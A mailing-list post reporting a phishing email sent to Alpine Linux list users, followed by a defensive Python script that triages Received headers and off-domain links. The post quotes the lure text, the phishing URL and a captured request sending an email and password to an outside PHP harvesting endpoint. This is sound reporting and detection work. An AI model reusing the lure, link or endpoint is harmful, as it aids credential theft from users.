From: Stefan Hartmann (Ingenieurbuero Hartmann)
To: ~alpine/users@lists.alpinelinux.org
Date: Sat, 8 Oct 2022 14:03:48 +0200
Subject: Your account associated with your alpine-user@lists.alpinelinux.org has been limited Reason ...
Message-ID: <3530b06a-bf3b-a3ef-ecce-1162bea953df@hafenthal.de>

Hello,

yesterday I received a suspicious email from alpinelinux.org:

"Notification
Dear alpine-user,
Your account associated with your alpine-user@lists.alpinelinux.org has been limited
Reason: Messages - Delivery Process Failed.
What happens when new messages are inaccessible?
Once a new message is limited, it will be inaccessible—users will not be able to receive new messages.
Want to keep the account and receive new messages?
..."

There is a pushbutton which leads to
https://siasky.net/EABzry9_94YhAghJPa5QmmPjGdw01d_BAgdPmQJCkk0vlA#alpine-user@lists.alpinelinux.org

I analyzed this with Burp: the pushbutton makes a POST

    POST //img/Jesse.php HTTP/1.1
    Host: ommarts.com
    ...
    email=alpine-user%40lists.alpinelinux.org&password=spearphising%3F

It returns a 200 OK.

Does alpinelinux.org really use the PHP script http://ommarts.com//img/Jesse.php ??? Suspicious!

The message comes from

    ...
    Received: from nld3-dev1.alpinelinux.org (nld3-dev1.alpinelinux.org [147.75.101.119])
        by gw1.hafenthal.de (Postfix) with ESMTPS id 0D51BA80B87
        for ; Fri, 7 Oct 2022 20:24:23 +0000 (UTC)
    ...

which seems OK. NB: received on an Alpinelinux mail relay!

Was there a breach?

--
Stefan Hartmann - ib.hafenthal.de
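As an added example (not part of Stefan's post and not Alpine's own tooling), a small defender-side triage script: it walks the Received chain oldest-first, pulls the From domain and the link hosts out of the body, and flags links that point outside the sender's domain. The sample message is constructed to resemble the report; the link host and list address come from the post, while gw1.example.net and the earliest hop mail.example-sender.test are made up.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample modelled on the reported message: the link host and list
# address are from the report; gw1.example.net and mail.example-sender.test are made up.
SAMPLE = """\
Received: from nld3-dev1.alpinelinux.org (nld3-dev1.alpinelinux.org [147.75.101.119]) by gw1.example.net (Postfix) with ESMTPS id 0D51BA80B87 for <alpine-user@lists.alpinelinux.org>; Fri, 7 Oct 2022 20:24:23 +0000 (UTC)
Received: from mail.example-sender.test (unknown [192.0.2.10]) by nld3-dev1.alpinelinux.org (Postfix) with ESMTP id 0000CAFE; Fri, 7 Oct 2022 20:24:20 +0000 (UTC)
From: "alpinelinux.org Notification" <noreply@alpinelinux.org>
To: alpine-user@lists.alpinelinux.org
Subject: Your account has been limited

Dear alpine-user,
Your account has been limited. Want to keep the account and receive new messages?
https://siasky.net/EABzry9_94YhAghJPa5QmmPjGdw01d_BAgdPmQJCkk0vlA#alpine-user@lists.alpinelinux.org
"""

URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
HOP = re.compile(r"from\s+(\S+).*?\bby\s+(\S+)", re.S)

def in_domain(host, domain):
    # host is the domain itself or one of its subdomains
    return host == domain or host.endswith("." + domain)

def hops(msg):
    # (from, by) pairs from the Received headers, oldest hop first
    found = []
    for hdr in msg.get_all("Received", []):
        m = HOP.search(hdr)
        if m:
            found.append((m.group(1).lower(), m.group(2).lower()))
    return found[::-1]

def triage(raw):
    msg = message_from_string(raw)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    links = sorted({h.lower() for h in URL_HOST.findall(msg.get_payload())})
    chain = hops(msg)
    # A hop through the claimed domain only shows the list relayed the message;
    # the host that injected it is the oldest "from" in the chain.
    injected_by = chain[0][0] if chain else ""
    offsite = [h for h in links if not in_domain(h, from_domain)]
    return {"from_domain": from_domain, "injected_by": injected_by, "hops": chain,
            "link_hosts": links, "offsite_links": offsite,
            "suspicious": bool(offsite) or not in_domain(injected_by, from_domain)}

if __name__ == "__main__":
    for k, v in triage(SAMPLE).items():
        print(f"{k}: {v}")
```

On the sample the script reports the link host siasky.net as off-site and the injecting host as mail.example-sender.test, even though the last hop does pass through nld3-dev1.alpinelinux.org.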